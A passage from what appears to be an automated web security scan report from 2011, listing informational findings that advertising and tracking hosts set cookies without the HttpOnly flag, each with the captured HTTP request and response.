Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317384286603_272223897_ap3103_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p270r=b$u-7#A.8Qp|i-1643195#2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/
Set-Cookie: imp=a$le#1317600624289_282559054_ap3100_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 352
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

<html><head></head><body>
<img src="http://bp.specificclick.net?pixid=99013083" width="1" height="1" /><img src="http://ads.bluelithium.com/pixel?id=1027970&t=2" width="1" height="1" /><img src="http
...[SNIP]...

14.153. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=219&fmt=redir&sec=0&pid=search2&type=Hotels&u1=&u2=Boston&u3=10/09/2011&u4=10/16/2011&u5=7&u6=&u7=S250&u8=B260711&u9=&u10=&u11=Boston+Logan+Intl.+%28BOS%29&u12=&u13=1&u14=MA&u15=US&OrderID=1317602253983&OrderValue= HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317602303729_239168105_as3104_imp|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p194r=b$u-98#5.8Qp|i-tracking#..1.8Qp.1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p219r=b$u-77#A.8Qp|i-H!FaxnS5xi!8TG!8Vy!IJ3~#1.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/
Set-Cookie: imp=a$le#1317602482047_282671641_ap3100_int|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:21 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.154. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:09:02 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 03 Oct 2011 01:09:02 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.155. http://leadback.hotwire.db.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.hotwire.db.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=airsearch_cs=1&betq=12047=428151&xbetq=view=hs^NA^Boston^10-09^10-16 HTTP/1.1
Host: leadback.hotwire.db.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:41:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:41:25 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.156. http://lm.trafficmp.com/clicksense/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lm.trafficmp.com
Path:   /clicksense/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/pixel?id=105935&t=i HTTP/1.1
Host: lm.trafficmp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; naiopt=out

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:41:31 GMT
Expires: Mon, 03 Oct 2011 00:41:31 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh18/127.0.0.1
Set-Cookie: T_7te4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d3c6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 2=3_7CU_i48Lo; Domain=.trafficmp.com; Expires=Tue, 02-Oct-2012 00:41:31 GMT; Path=/
Set-Cookie: 8=00000000000; Domain=.trafficmp.com; Expires=Sat, 01-Oct-2016 00:41:31 GMT; Path=/
Accept-Ranges: bytes
Last-Modified: Fri, 23 Sep 2011 14:41:54 GMT
Content-Type: image/png
Content-Length: 123
Connection: close

.PNG
.
...IHDR.....................sRGB........    pHYs..........+......tIME.....0/D..O...IDAT..c````......^.*:....IEND.B`.

14.157. http://loadm.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=071&j=0&buid=55785307-A5DC-4E3A-B452-DDBD426D3A1D HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NzeLN440MTOINzA3jDeINlaxrawFA5Qzi; expires=Tue, 31-Jan-2012 00:09:46 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:46 GMT
Server: HTTP server


14.158. http://m.xp1.ru4.com/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?_o=1807966&_t=17210472&_c=17210403&_b=17210472&ssv_c2=Y&ssv_b=c2&ssv_1=285445478 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/AVE/iview/285445478/direct;wi.728;hi.90/01/yAeNjx,bhirWmWzqkjb?click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d111781%26AdID%3d150102%26TargetID%3d9683%26Values%3d215%26Redirect%3d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1; domain=.ru4.com; path=/
Cache-control: private, no-cache, must-revalidate
Content-type: image/gif
Content-length: 43
X-Cnection: close

GIF89a.............!.......,...........D..;

14.159. http://m.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=tg&ssv_tg_1=&ssv_tg_2=&ssv_tg_3=000&ssv_tg_4=&ssv_duid=&ssv_tg_5=0&ssv_tg_6=0&ssv_tg_7=0&ssv_tg_8=k23-0,k24-0,k25-0,k26-0,k28-0,k29-0,k30-0,k31-0,k32-0,k33-0,k34-0,k35-0,k36-0 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:20 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 66281-B66290=3|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close


14.160. http://m.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=dx&ssv_duid=&ssv_dx_1=&ssv_dx_2=&ssv_dx_3= HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1; 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:13:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 90514-B90519=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close


14.161. http://m.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; domain=.ru4.com; path=/
Location: http://adadvisor.net/adscores/g.pixel?sid=9297587126
Content-length: 0
X-Cnection: close


14.162. http://o-va1.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5Mj
...[SNIP]...

14.163. http://o-va3.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3ND
...[SNIP]...

14.164. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-15.js?cb=0.46589411422610283 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
